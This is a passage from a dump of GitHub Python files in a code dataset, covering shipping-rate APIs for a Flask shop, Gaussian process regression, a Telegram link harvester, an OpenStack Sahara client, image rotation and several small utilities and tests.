we raise\n if file_size_fun() > self.max_file_size:\n raise _FileMaxSizeReached(\"Maximum file size reached\")\n\n # Try to get the next element, if we reached the end, we stop\n try:\n line = next(lines)\n except StopIteration:\n break\n\n yield line\n\n def _writelines_to_file(\n self, file_path: pathlib.Path, lines: Iterator[bytes]\n ) -> None:\n \"\"\"Write lines to a file until we reach the max_file_size\n\n Raises:\n _FileMaxSizeReached: When the file if bigger that the max_file_size\n \"\"\"\n with gzip.open(file_path, mode=\"ab\") as f:\n for line in self._iterate_line_until_file_max_size(f.tell, lines):\n f.write(line)\n\n def get_current_file_index(self) -> int:\n \"\"\"The number suffix of the file to write the next documents\n\n Returns:\n int: Index of next file\n \"\"\"\n filenames = [f.name for f in self.path.glob(\"tweets-*.jsonl.gz\") if f.is_file()]\n return get_latest_file_index(filenames)\n\n def file_index_to_name(self, index: int) -> pathlib.Path:\n return self.path / f\"tweets-{index}.jsonl.gz\"\n\n def writelines(self, lines: Iterable[bytes]) -> None:\n lines_iterator = iter(lines)\n file_index = self.get_current_file_index()\n while True:\n file_path = self.file_index_to_name(file_index)\n try:\n _logger.info(f\"Starting to write to file {file_path}\")\n self._writelines_to_file(file_path, lines_iterator)\n except _FileMaxSizeReached:\n # Move to next file\n file_index += 1\n else:\n # We went reached the end of the stream\n break\n","repo_name":"smassonnet/twcollect","sub_path":"src/twcollect/drivers/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37845934782","text":"from dataclasses import dataclass\nfrom decimal import Decimal\nimport os\nfrom xml.etree import ElementTree as ET\n\nfrom flask import current_app\nimport requests\n\n# from requests_futures.sessions import FuturesSession # if using async requests\nimport xmltodict\nimport zeep\n\n\nORIGIN_ADDRESS = os.environ.get(\"ORIGIN_ADDRESS\")\nUSPS_USER_ID = os.environ.get(\"USPS_USER_ID\")\nUSPS_PASS = os.environ.get(\"USPS_PASS\")\nUSPS_PRODUCTION_URL = \"http://production.shippingapis.com/ShippingAPI.dll\"\nUSPS_SECURE_URL = \"https://secure.shippingapis.com/ShippingAPI.dll\"\nSHIPENGINE_KEY = os.environ.get(\"SHIPENGINE_KEY\")\nSHIPENGINE_GET_RATES = os.environ.get(\"SHIPENGINE_GET_RATES\", False)\nENDICIA_ID = os.environ.get(\"ENDICIA_KEY\")\nFEDEX_ID = os.environ.get(\"FEDEX_ID\")\nFEDEX_KEY = os.environ.get(\"FEDEX_KEY\")\nFEDEX_PASS = os.environ.get(\"FEDEX_PASS\")\nFEDEX_ACCOUNT = os.environ.get(\"FEDEX_ACCOUNT\")\nFEDEX_METER = os.environ.get(\"FEDEX_METER\")\n\nWebAuthenticationDetail = {\"UserCredential\": {\"Key\": FEDEX_KEY, \"Password\": FEDEX_PASS}}\nClientDetail = {\"AccountNumber\": FEDEX_ACCOUNT, \"MeterNumber\": FEDEX_METER}\nVersion = {\"Major\": 24, \"ServiceId\": \"crs\", \"Intermediate\": 0, \"Minor\": 0}\n\n\n@dataclass\nclass ShippingAddress:\n postal_code: str\n name: str = \"\"\n phone: str = \"\"\n company_name: str = \"\"\n address_line1: str = \"\"\n address_line2: str = \"\"\n city: str = \"Seattle\"\n state: str = \"WA\"\n country: str = \"US\"\n\n\ndefault_origin = ShippingAddress(ORIGIN_ADDRESS or \"98101\")\n\n\n@dataclass\nclass DestinationAddress(ShippingAddress):\n origin_address: ShippingAddress = ShippingAddress(\"98101\")\n\n def get_shipengine(self, origin_address=default_origin, weight: int = 1):\n \"\"\"\n Get rates from shipengine. Because of potential fees, this is avoided unless explicitly invoked\n :param origin_address: 'ShippingAddress'\n :param weight: int ounces\n :return: rate dictionary\n \"\"\"\n rate_url = \"https://api.shipengine.com/v1/rates\"\n headers = {\"Content-type\": \"application/json\", \"api-key\": SHIPENGINE_KEY}\n\n ship_data = {\n \"shipment\": {\n \"validate_address\": \"no_validation\",\n \"ship_to\": {\n \"postal_code\": self.postal_code,\n \"country_code\": self.country,\n },\n \"ship_from\": {\n \"name\": origin_address.name,\n \"phone\": origin_address.phone,\n \"company_name\": origin_address.company_name,\n \"address_line1\": origin_address.address_line1,\n \"address_line2\": origin_address.address_line2,\n \"city_locality\": origin_address.city,\n \"state_province\": origin_address.state,\n \"postal_code\": origin_address.postal_code,\n \"country_code\": origin_address.country,\n },\n \"packages\": [{\"weight\": {\"value\": weight, \"unit\": \"ounce\"}}],\n },\n \"rate_options\": {\"carrier_ids\": [FEDEX_ID, ENDICIA_ID]},\n }\n rate_json = requests.post(rate_url, headers=headers, json=ship_data).json()\n rate_values = [\n {\n \"service\": rate.get(\"service_code\"),\n \"rate\": rate.get(\"shipping_amount\").get(\"amount\"),\n }\n for rate in rate_json[\"rate_response\"][\"invalid_rates\"]\n ]\n return rate_values\n\n def _request_usps_domestic(self, weight, origin_address=default_origin):\n \"\"\"\n Structure and send request for USPS rates\n :param weight: in oz\n :type origin_address: 'ShippingAddress'\n :return: Ordered Dict of services and rates\n \"\"\"\n current_app.logger.info(weight)\n request_xml = ET.Element(\"RateV4Request\")\n request_xml.attrib = {\"USERID\": str(USPS_USER_ID)}\n\n ET.SubElement(request_xml, \"Revision\").text = \"2\"\n\n package_xml = ET.SubElement(request_xml, \"Package\")\n package_xml.attrib = {\"ID\": \"EX158\"}\n\n ET.SubElement(package_xml, \"Service\").text = \"ALL\"\n ET.SubElement(package_xml, \"FirstClassMailType\").text = \"ALL\"\n ET.SubElement(package_xml, \"ZipOrigination\").text = str(\n origin_address.postal_code or \"98101\"\n )\n ET.SubElement(package_xml, \"ZipDestination\").text = str(\n self.postal_code or \"66606\"\n )\n ET.SubElement(package_xml, \"Pounds\").text = \"0\"\n ET.SubElement(package_xml, \"Ounces\").text = str(weight)\n ET.SubElement(package_xml, \"Container\")\n ET.SubElement(package_xml, \"Size\").text = \"Regular\"\n ET.SubElement(package_xml, \"Machinable\").text = \"true\"\n data_xml = {\"API\": \"RateV4\", \"XML\": ET.tostring(request_xml, \"unicode\")}\n\n results = requests.post(url=USPS_PRODUCTION_URL, data=data_xml)\n return results\n\n def get_usps_domestic(self, weight: int = 1) -> dict:\n \"\"\"\n Take result from usps api call and output rate data as dict\n :return: rate dict\n \"\"\"\n try:\n parsed_results = xmltodict.parse(\n self._request_usps_domestic(weight).content\n )[\"RateV4Response\"][\"Package\"][\"Postage\"]\n priority = next(\n (\n Decimal(service[\"Rate\"])\n for service in parsed_results\n if service[\"@CLASSID\"] == \"1\"\n ),\n None,\n )\n first_class = next(\n (\n Decimal(service[\"Rate\"])\n for service in parsed_results\n if service[\"MailService\"]\n == \"First-Class Package Service - Retail<sup>™</sup>\" # Get Better Identifiers\n ),\n None,\n )\n rates = {\"USPS_PRIORITY\": priority, \"USPS_FIRST_CLASS\": first_class}\n except KeyError:\n rates = {\"USPS_PRIORITY\": None, \"USPS_FIRST_CLASS\": None}\n return rates\n\n def get_fedex_rates(self, origin_address=default_origin, weight=1.0):\n \"\"\"\n Get FedEx Rates using webservices\n :param origin_address: 'ShippingAddress'\n :param weight: in ounces\n :return: rate dict\n \"\"\"\n fedex_client = zeep.Client(\n current_app.open_instance_resource(\"RateService_v24.wsdl\")\n )\n requested_shipment = {\n \"Shipper\": {\n \"Address\": {\n \"PostalCode\": origin_address.postal_code,\n \"CountryCode\": origin_address.country,\n \"StateOrProvinceCode\": origin_address.state,\n }\n },\n \"Recipient\": {\n \"Address\": {\n \"PostalCode\": self.postal_code or 32703,\n \"CountryCode\": self.country or \"US\",\n }\n },\n \"RequestedPackageLineItems\": {\n \"Weight\": {\"Units\": \"LB\", \"Value\": weight},\n \"GroupPackageCount\": 1,\n },\n \"PackageCount\": 1,\n }\n try:\n rate_request = fedex_client.service.getRates(\n WebAuthenticationDetail=WebAuthenticationDetail,\n ClientDetail=ClientDetail,\n Version=Version,\n RequestedShipment=requested_shipment,\n )\n ground_rate = [\n reply\n for reply in rate_request[\"RateReplyDetails\"]\n if reply[\"ServiceType\"] == \"FEDEX_GROUND\"\n ]\n ground_rate_value = ground_rate[0][\"RatedShipmentDetails\"][0][\n \"ShipmentRateDetail\"\n ][\"TotalNetFedExCharge\"][\"Amount\"]\n except (IndexError, zeep.exceptions.ValidationError):\n ground_rate_value = None\n return {\"FEDEX_GROUND\": ground_rate_value}\n","repo_name":"MarkWine/flask_shop","sub_path":"shop/blueprints/cart/shipping.py","file_name":"shipping.py","file_ext":"py","file_size_in_byte":7879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13662439348","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: pranavburugula\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport re\nimport sys\nimport pyedflib\nfrom multiprocessing import Pool\n\n\n\n\nepochLength = 1000 # In milliseconds\nslidingWindowLength = 10 # In number of epochs\n\ndef calculateLineLength(filename):\n if (re.search('\\.edf', filename) != None):\n f = pyedflib.EdfReader(sys.argv[1])\n numChannels = f.signals_in_file\n print (\"number of signals in file = \", numChannels)\n signal_labels = f.getSignalLabels()\n print (\"signal labels = \", signal_labels)\n\n numSamples = f.getNSamples()[0]\n sampleFrequency = f.getSampleFrequency(0)\n # fields['fs'] contains the frequency\n numSamplesPerEpoch = int(sampleFrequency * 1000 / epochLength)\n sigbufs = np.zeros((numChannels, numSamples))\n for i in np.arange(numChannels):\n sigbufs[i, :] = f.readSignal(i)\n sigbufs = sigbufs.transpose()\n allChannelsDF = pd.DataFrame(data = sigbufs[:,:], columns = signal_labels)\n llDf = pd.DataFrame(columns = signal_labels)\n print (allChannelsDF.shape)\n# for i in range(20):\n# allChannelsDF = allChannelsDF.add(other = sig[i, :])\n print (allChannelsDF.head())\n \n for i in range(1000):\n if (i > numSamplesPerEpoch):\n row = allChannelsDF.iloc[i-1] - allChannelsDF.iloc[i]\n for j in range(2, numSamplesPerEpoch):\n row = row + (allChannelsDF.iloc[i-j] - allChannelsDF.iloc[i-j+1])\n# llDf = llDf.append(allChannelsDF.iloc[i] - allChannelsDF.iloc[i+1], \n# ignore_index=True)\n llDf = llDf.append(row, ignore_index=True)\n \n print (\"Printing Line Length Data frame\")\n print (llDf.head())\n return\n\n\n#p = Pool()\n#p.map(calculateLineLength, [filesList[0]])\n#print (filesList[0])\n#calculateLineLength(filesList[0])\n \nprint (sys.argv[1])\ncalculateLineLength(sys.argv[1])\n","repo_name":"pbscires/ExtractAndTransformFeatures","sub_path":"extractFeature_LineLength.py","file_name":"extractFeature_LineLength.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8827974110","text":"\nclass TimeTicker(object):\n def __init__(self, interval, startep, endep):\n self.interval = interval\n self.startep = startep\n self.endep = endep\n self.epoch = startep\n self.EOF = False\n\n def tick(self):\n self.epoch += self.interval\n if self.epoch > self.endep:\n self.EOF = True\n return False\n else:\n return True\n","repo_name":"toku463ne/stockAnalyzer","sub_path":"time_ticker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33486859785","text":"#/packages/python/anaconda3/bin\n\nfrom __future__ import division\nimport numpy as np\nimport warnings\nfrom .covariance_functions import *\nfrom scipy.stats import multivariate_normal\nfrom scipy.spatial.distance import euclidean\nfrom scipy.spatial import distance_matrix\nfrom numpy.linalg import inv\nfrom scipy.optimize import minimize\n\n\nclass gaussian_process:\n \"\"\"\n This class instantiates an object for basic mean zero Guassian Process Regression\n \"\"\"\n def __init__(self, x_star, x, y, sigma_squared, cov_obj, cov_func='squared_exponential'):\n \"\"\"\n Parameters\n ----------\n x_star: float\n Scalar or vector to be evaluated\n\n x: float\n Feature vector\n\n y: float\n Response vector\n\n sigma_squared: float (scalar)\n Assumed homoscedastic error for error model\n .. math: y_i = f(x_i) + e_i, e_i \\\\sim N(0, \\\\sigma^2)\n\n cov_obj: object\n Covariance function object\n\n cov_func: str (optional)\n Covariance function to be used. Available functions are:\n Squared exponential = 'squared_exponential'\n Matern 5/2 = 'matern_52'\n Matern 3/2 = 'matern_32'\n Attributes\n ----------\n model_error: float (array_like)\n Matrix representing the error model\n .. math: \\\\text{model_error} = \\\\sigma^2 I\n \"\"\"\n self.x_star = x_star\n self.x = x\n self.y = y\n self.sigma_squared = sigma_squared\n self.model_error = self.sigma_squared*np.eye(self.x.shape[0])\n self.cov_obj = cov_obj\n self.cov_func = cov_func\n self.calc_cov_components()\n\n\n def calc_cov_components(self):\n \"\"\"\n Notes\n ----------\n Calculates the block matrix components of the joint Guassian between the GP prior at x and at x^*\n .. math :: [f(x_1), ... , f(x_N), f(x^*)]^T \\\\sim \\text{N} \\\\left ( \\\\begin{bmatrix} \\\\mathbf{m} \\\\ m^*\\\\end{bmatrix}, \\\\begin{bmatrix} C(\\\\mathbf{x, x}) & C(\\\\mathbf{x^*x}) \\\\ C(\\\\mathbf{x^*x})^T & C(\\\\mathbf{x^*, x^*})\\\\end{bmatrix}\\\\right)\n\n Attributes\n ----------\n C_xx: array_like\n Covariance function evaluated with x\n\n C_x_star_x: array_like\n Covariance function evaluated with x^* and x\n\n C_star_star: array_like\n Covariance function evaluated with x^*\n \"\"\"\n self.C_xx = getattr(self.cov_obj, self.cov_func)(self.x, self.x)\n self.C_x_star_x = getattr(self.cov_obj, self.cov_func)(self.x_star, self.x)\n self.C_star_star = getattr(self.cov_obj, self.cov_func)(self.x_star, self.x_star)\n\n def calc_mean_cov(self):\n \"\"\"\n Notes\n ----------\n Calculates the posterior mean and covariance of the GP\n\n Attributes\n ----------\n post_mean: float (vector)\n Posterior mean of the GP\n\n post_cov: float (array_like)\n Posterior covariance of the GP\n\n \"\"\"\n # Calculate weights matrix, W = C(x^*, x) (C(x, x) + \\\\sigma^2 I)^{-1}\n M = inv(self.C_xx + self.model_error)\n\n weights = self.C_x_star_x @ M\n\n # Calculate y_star, y^* = W^T y\n self.post_mean = np.transpose(weights) @ self.y\n\n # Calculates posterior variance, var[f(x^*)| y] = C(x^*, x^*) - C(x^*, x) ( C(x, x) + \\\\sigma^2 I)^{-1} C(x^*, x)^T\n self.post_cov = self.C_star_star - self.C_x_star_x @ M @ np.transpose(self.C_x_star_x)\n\n def regression(self):\n \"\"\"\n Attributes\n ----------\n post_var: float (vector)\n Diagonal elements of posterior covariance\n\n Returns\n ----------\n post_mean: float (vector)\n Posterior mean of GP\n\n post_var: float (vector)\n Diagonal elements of posterior covariance\n \"\"\"\n self.calc_mean_cov()\n self.post_var = np.diag(self.post_cov)\n return self.post_mean, self.post_var\n\n def log_marginal_likelihood(self):\n \"\"\"\n Returns\n ----------\n log_marinal_likelihood: float (scalar)\n Log marginal likelihood evaluated at y with covariance:\n .. math :: \\\\sigma^2 I + C(x, x)\n \"\"\"\n return multivariate_normal.logpdf(self.y, cov=(self.model_error + self.C_xx))\n\n\n def optimize_lml(self, bounds=[(10**-3, 10**3),(10**-3, 10**5)], method=None):\n \"\"\"\n Parameters\n ----------\n bounds: sequence, or bounds (optional)\n 1. Instance of Bounds class\n 2. Sequence of (min, max) pairs for each b and tau_1\n\n method: str or callable (optional)\n Type of solver (see scipy.optimize.minimize for details)\n\n Notes\n ----------\n Optimizes hyperparameters of the covariance function by maximimizing the log marginal likelihood. Optimized using BFGS by default from scipy.optimize.minimize method.\n \"\"\"\n # Initial params\n b, tau_1 = self.cov_obj.b, self.cov_obj.tau_1\n params = [b, tau_1]\n\n # Wrapper function used to optimize the log marginal-likelihood\n def func(params):\n # Unpacks parameters to be optimized\n b, tau_1 = params\n\n temp_cov = covariance_functions(b, tau_1)\n\n # Evaluates covariance function\n temp_C_xx = getattr(temp_cov, self.cov_func)(self.x, self.x)\n\n # Evaluates covariance of marginal-likelihood: \\sigma^2 I + C\n covariance = self.model_error + temp_C_xx\n\n # Returns the negative of the marginal log-likelihood multivariate normal (in order to maximize the evaluation)\n return -multivariate_normal.logpdf(self.y, cov=covariance)\n\n # Uses optimization function to find optimal b and tau_1_squared. \n res = minimize(func, [b, tau_1], bounds=bounds, method=method)\n\n # Unpacks results of the optimization step\n self.cov_obj.b, self.cov_obj.tau_1 = res.x\n\n # Recalculates the covariance components\n self.calc_cov_components()\n\n def rvs(self, size=None):\n \"\"\"\n Parameters\n -----------\n size: int (optional)\n Number of samples to return. If None, returns only one sample.\n\n Returns\n ----------\n samples: float (vector or array_like)\n Samples drawn from a multivariate normal described by the posterior GP mean and covariance\n \"\"\"\n if not hasattr(self, 'post_mean'):\n self.calc_mean_cov()\n return stats.multivariate_normal.rvs(mean=self.post_mean, cov=self.post_cov, size=size)\n\n def prior_rvs(self, size=None):\n \"\"\"\n Parameters\n -----------\n size: int (optional)\n Number of samples to return. If None, returns only one sample.\n\n Returns\n ----------\n samples: float (vector or array_like)\n Samples drawn from a multivariate normal described by the mean zero GP prior\n \"\"\"\n return stats.multivariate_normal.rvs(mean=np.zeros(len(self.y)), cov=self.C_xx, size=size)","repo_name":"janmichaelcabrera/gp_regression","sub_path":"gaussian_process.py","file_name":"gaussian_process.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75146331451","text":"from saharaclient.api import base\n\n\nclass DataSources(base.Resource):\n resource_name = 'Data Source'\n\n\nclass DataSourceManagerV1(base.ResourceManager):\n resource_class = DataSources\n version = 1.1\n\n def create(self, name, description, data_source_type,\n url, credential_user=None, credential_pass=None,\n is_public=None, is_protected=None, s3_credentials=None):\n \"\"\"Create a Data Source.\"\"\"\n\n data = {\n 'name': name,\n 'description': description,\n 'type': data_source_type,\n 'url': url,\n }\n credentials = {}\n self._copy_if_defined(credentials,\n user=credential_user,\n password=credential_pass)\n credentials = credentials or s3_credentials\n self._copy_if_defined(data, is_public=is_public,\n is_protected=is_protected,\n credentials=credentials)\n\n return self._create('/data-sources', data, 'data_source')\n\n def list(self, search_opts=None, limit=None, marker=None,\n sort_by=None, reverse=None):\n \"\"\"Get a list of Data Sources.\"\"\"\n query = base.get_query_string(search_opts, limit=limit, marker=marker,\n sort_by=sort_by, reverse=reverse)\n url = \"/data-sources%s\" % query\n return self._page(url, 'data_sources', limit)\n\n def get(self, data_source_id):\n \"\"\"Get information about a Data Source.\"\"\"\n return self._get('/data-sources/%s' % data_source_id, 'data_source')\n\n def delete(self, data_source_id):\n \"\"\"Delete a Data Source.\"\"\"\n self._delete('/data-sources/%s' % data_source_id)\n\n def update(self, data_source_id, update_data):\n \"\"\"Update a Data Source.\n\n :param dict update_data: dict that contains fields that should be\n updated with new values.\n\n Fields that can be updated:\n\n * name\n * description\n * type\n * url\n * is_public\n * is_protected\n * credentials - dict with the keys `user` and `password` for data\n source in Swift, or with the keys `accesskey`, `secretkey`,\n `endpoint`, `ssl`, and `bucket_in_path` for data source in S3\n \"\"\"\n\n if self.version >= 2:\n UPDATE_FUNC = self._patch\n else:\n UPDATE_FUNC = self._update\n\n return UPDATE_FUNC('/data-sources/%s' % data_source_id,\n update_data)\n\n\nclass DataSourceManagerV2(DataSourceManagerV1):\n version = 2\n\n\n# NOTE(jfreud): keep this around for backwards compatibility\nDataSourceManager = DataSourceManagerV1\n","repo_name":"openstack/python-saharaclient","sub_path":"saharaclient/api/data_sources.py","file_name":"data_sources.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"78"} +{"seq_id":"70153833532","text":"from django.urls import path, include, re_path\nfrom . import views\n\nurlpatterns = [\n path('', views.main),\n path('main/', views.main, name='city_main'),\n path('news/', views.news, name='city_news'),\n path('city_heads/', views.city_heads, name='city_heads'),\n path('facts/', views.facts, name='city_facts'),\n path('contacts/', views.contacts, name='city_contacts'),\n path('history/', views.history_main, name='city_history'),\n path('history/photo', views.history_photos, name='city_history_1'),\n path('history/people', views.history_people, name='city_history_2')\n]","repo_name":"anmatkovskii/python","sub_path":"ITStep education/DjangoPyLearning/first_django/city_website_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23477547258","text":"\"\"\" Connect to telegram and find links from recent chats.\n\nTELE_API_ID and TELE_API_HASH must be set in environment to run.\n\nOutput telelinks.tsv file to be loaded into google sheets for further processing.\n <Channel_Name> <link> <date> <found_on_existing_sheets>\n\nExample Summary Columns:\n Unique Links =UNIQUE(SORT('link dump'!B2:B))\n Occurances =COUNTIF('link dump'!B:B,A2)\n First Seen =MINIFS('link dump'!C:C,'link dump'!B:B,A2)\n Last Seen =MAXIFS('link dump'!C:C,'link dump'!B:B,A2)\n Existing Sheets =VLOOKUP(A2, 'link dump'!B:D, 3, FALSE)\n\n\"\"\"\nimport argparse\nimport json\nimport logging\nimport os\nimport re\nfrom collections import defaultdict\nfrom datetime import timedelta, datetime\n\nimport pytz\nfrom telethon.sync import TelegramClient\n\nimport linkcheck\n\nLOG = logging.getLogger('ualinks')\nTELE_API_ID = os.environ.get('TELE_API_ID')\nTELE_API_HASH = os.environ.get('TELE_API_HASH')\n\nTELE_CHANNELS = 'telechannels.json'\nURL_RE = re.compile(\"(https?://[^\\s]+)\")\nDATE_FMT = \"%Y-%m-%d %H:%M:%S\"\nMIN_AGE = 36\nTSV_OUTPUT = \"telelinks.tsv\"\n\n\ndef main():\n args = parse_args()\n level = logging.WARN\n if args.verbose:\n level = logging.INFO\n if args.debug:\n level = logging.DEBUG\n LOG.setLevel(level)\n\n if not all([TELE_API_ID, TELE_API_HASH]):\n LOG.warning(\"TELE_API_ID or TELE_API_HASH not set correctly in environment.\")\n\n with open(TELE_CHANNELS, 'r') as fh:\n channels = json.load(fh)\n\n client = TelegramClient('ualinks', TELE_API_ID, TELE_API_HASH)\n client.start()\n now = datetime.now()\n\n threshhold = pytz.UTC.localize(now - timedelta(hours=args.hours))\n\n links = defaultdict(list)\n for channel_name, channel_id in channels.items():\n LOG.info(\"Looking up %s (%s)\", channel_name, channel_id)\n oldest = None\n newest = None\n kwargs = {'limit': 200}\n try:\n for _ in range(999):\n LOG.debug(\"Iter (%d) on %s\", _, channel_name)\n for message in client.get_messages(channel_id, **kwargs):\n date_string = message.date.strftime(DATE_FMT)\n if oldest is None or message.date < oldest.date:\n oldest = message\n if newest is None or message.date > newest.date:\n newest = message\n\n for url in URL_RE.findall(str(message.message)):\n links[channel_name].append((url, date_string))\n if oldest.date < threshhold:\n LOG.debug(\"Oldest message exceeds window: %s\", oldest.date)\n LOG.info(\"Channel complete\")\n break\n else:\n LOG.info(\"Going deeper. max_id=%s\", oldest.id)\n kwargs['max_id'] = oldest.id\n except ValueError:\n LOG.warning(\"Can't connect to: %s\" % channel_name)\n pass\n\n existing_links = {}\n if args.compare:\n existing_links = linkcheck.get_links(args.compare)\n\n with open(args.output, 'w', encoding=\"utf-8\") as fh:\n for channel_name, items in links.items():\n for url, timestamp in items:\n found_sheet = []\n for sheet, elinks in existing_links.items():\n if url in elinks:\n found_sheet.append(sheet)\n\n line = \"\\t\".join([str(channel_name), url, timestamp, ','.join(found_sheet)])\n fh.write(line+\"\\n\")\n print(line)\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('output', type=str, default=TSV_OUTPUT,\n help='Path where output TSV will be written (default: %s)' % TSV_OUTPUT)\n parser.add_argument('-c', '--compare', type=str, help=\"Excel document to compare\")\n parser.add_argument('-d', '--debug', action='store_true', help='Show debug messages.')\n parser.add_argument('-v', '--verbose', action='store_true', help='Show info messages.')\n parser.add_argument('--hours', type=int, default=MIN_AGE,\n help='Number of hours to collect (default: %s)' % MIN_AGE)\n return parser.parse_args()\n\nif __name__=='__main__':\n LOG.addHandler(logging.StreamHandler())\n LOG.handlers[-1].setFormatter(logging.Formatter(logging.BASIC_FORMAT))\n main()","repo_name":"krets/ua-link-helpers","sub_path":"telelinkgrabber.py","file_name":"telelinkgrabber.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6956820935","text":"'''\n\tPACKAGE DEVELOPED BY : SUBHAM GHOSH\n\tROLL NO. : 20CS10065\n\tSECOND YEAR UNDERGRADUATE STUDENT CSE\n\tIIT KGP\n'''\n\n#if degree argument is given wrong then the image is not rotated at all\n#Imports\nfrom PIL import Image\n\nsupported_image_types = [\"<class 'PIL.JpegImagePlugin.JpegImageFile'>\", \"<class 'PIL.PngImagePlugin.PngImageFile'>\", \"<class 'PIL.Image.Image'>\"]\n\nclass RotateImage(object):\n '''\n Rotates the image about the centre of the image.\n '''\n\n def __init__(self, degrees, doNotClipAtEdges=True):\n '''\n Arguments:\n degrees: rotation degree.\n '''\n\n # Write your code here\n self.doNotClipAtEdges = doNotClipAtEdges\n if(type(degrees)==int or type(degrees)==float):\n self.degrees = degrees\n else:\n print(\"\\n<> Exception : Degree Argument must be of Type INT or FLOAT! Setting degrees = 0\\n\")\n self.degrees = 0\n\n def __call__(self, sample):\n '''\n Arguments:\n image (numpy array or PIL image)\n\n Returns:\n image (numpy array or PIL image)\n '''\n\n # Write your code here\n if (str(type(sample)) in supported_image_types):\n return sample.rotate(self.degrees,expand=self.doNotClipAtEdges)\n elif (str(type(sample)) == \"<class 'numpy.ndarray'>\"):\n return Image.fromarray(sample).rotate(self.degrees,expand=self.doNotClipAtEdges)\n else:\n print(\"\\n<> Exception : Image Argument must be of Type PIL IMAGE/JPEG IMAGE/PNG IMAGE or NUMPY ARRAY!\\n\")\n return None\n\n\n#testing code for debugging purpose ->\n#obj1 = RotateImage(30);\n#img = Image.open(r\"C:\\Users\\mezartine\\Downloads\\CS29006_SW_Lab_Spr2022-master\\Python_DS_Assignment\\data\\imgs\\5.jpg\").convert('RGBA')\n#RotateImage(30)(img,False).show()\n#img = RotateImage(\"s\")(6)\n","repo_name":"frediff/AI_Image_Toolkit","sub_path":"my_package/data/transforms/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"13546059256","text":"#!/usr/bin/env python\n\nfrom glucose import plots\n\nimport inspect\n\nimport matplotlib.pyplot as plt\n\n\ndef close_plot(fig):\n plt.close(fig.figure)\n\n\ndef load_plots(from_date=None):\n for attribute in dir(plots):\n attribute = getattr(plots, attribute)\n if inspect.isclass(attribute) and issubclass(\n attribute, plots.base.Plot) and attribute.__name__ != 'Plot':\n yield attribute(from_date=from_date)\n","repo_name":"niedbalski/glucose","sub_path":"glucose/plots/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30983107383","text":"\"\"\"Diagram editor.\nMain application.\n\"\"\"\n\nimport tkinter as tk\n\nfrom ui.workspace import Workspace\nfrom ui.toolbar import Toolbar\n\n\nclass Main:\n \"\"\"Main application class.\n \"\"\"\n WINDOW_WIDTH = 1200\n WINDOW_HEIGHT = 800\n\n def __init__(self):\n \"\"\"Init.\n \"\"\"\n self._root = tk.Tk()\n self._root['bg'] = 'green'\n self._root.title('Diagram editor')\n self._root.geometry(\n f'{self.WINDOW_WIDTH}x{self.WINDOW_HEIGHT}+100+100'\n )\n\n self._toolbar = Toolbar(self._root)\n self._workspace = Workspace(\n self._root,\n pop_selection_from_toolbar_callback=self._toolbar.pop_selected\n )\n\n def run(self):\n \"\"\"Run application.\n \"\"\"\n self._root.mainloop()\n\n\n# ---- START ---- #\n\nif __name__ == '__main__':\n Main().run()\n","repo_name":"sychov/diagram_editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24906580299","text":"import itertools\nimport math\nimport multiprocessing\nimport random\nimport tempfile\nfrom concurrent.futures import ProcessPoolExecutor\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Dict, List, Union\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom omegaconf import DictConfig, ListConfig, OmegaConf\nfrom pytorch_lightning import seed_everything\n\nfrom anomalib.utils.sweep.config import flatten_sweep_params\nfrom tests.helpers.dataset import get_dataset_path\nfrom tests.helpers.model import model_load_test, setup_model_train\n\n\ndef get_model_nncf_cat() -> List:\n \"\"\"Test helper for getting cartesian product of models and categories.\n\n Returns:\n List: Returns a combination of models with their nncf support for each category.\n \"\"\"\n model_support = [\n (\"cflow\", False),\n (\"csflow\", False),\n (\"dfkde\", False),\n (\"dfm\", False),\n (\"ganomaly\", False),\n # (\"stfpm\", True),\n (\"padim\", False),\n (\"patchcore\", False),\n (\"stfpm\", False),\n ]\n categories = random.sample(\n [\n \"bottle\",\n \"cable\",\n \"capsule\",\n \"carpet\",\n \"grid\",\n \"hazelnut\",\n \"leather\",\n \"metal_nut\",\n \"pill\",\n \"screw\",\n \"tile\",\n \"toothbrush\",\n \"transistor\",\n \"wood\",\n \"zipper\",\n ],\n k=3,\n )\n\n return [\n (model, nncf, category) for ((model, nncf), category) in list(itertools.product(*[model_support, categories]))\n ]\n\n\nclass TestModel:\n \"\"\"Run Model on all categories.\"\"\"\n\n def _test_metrics(self, trainer, config, model, datamodule):\n \"\"\"Tests the model metrics but also acts as a setup.\"\"\"\n\n results = trainer.test(model=model, datamodule=datamodule)[0]\n\n thresholds = OmegaConf.load(\"tests/nightly/models/performance_thresholds.yaml\")\n\n threshold = 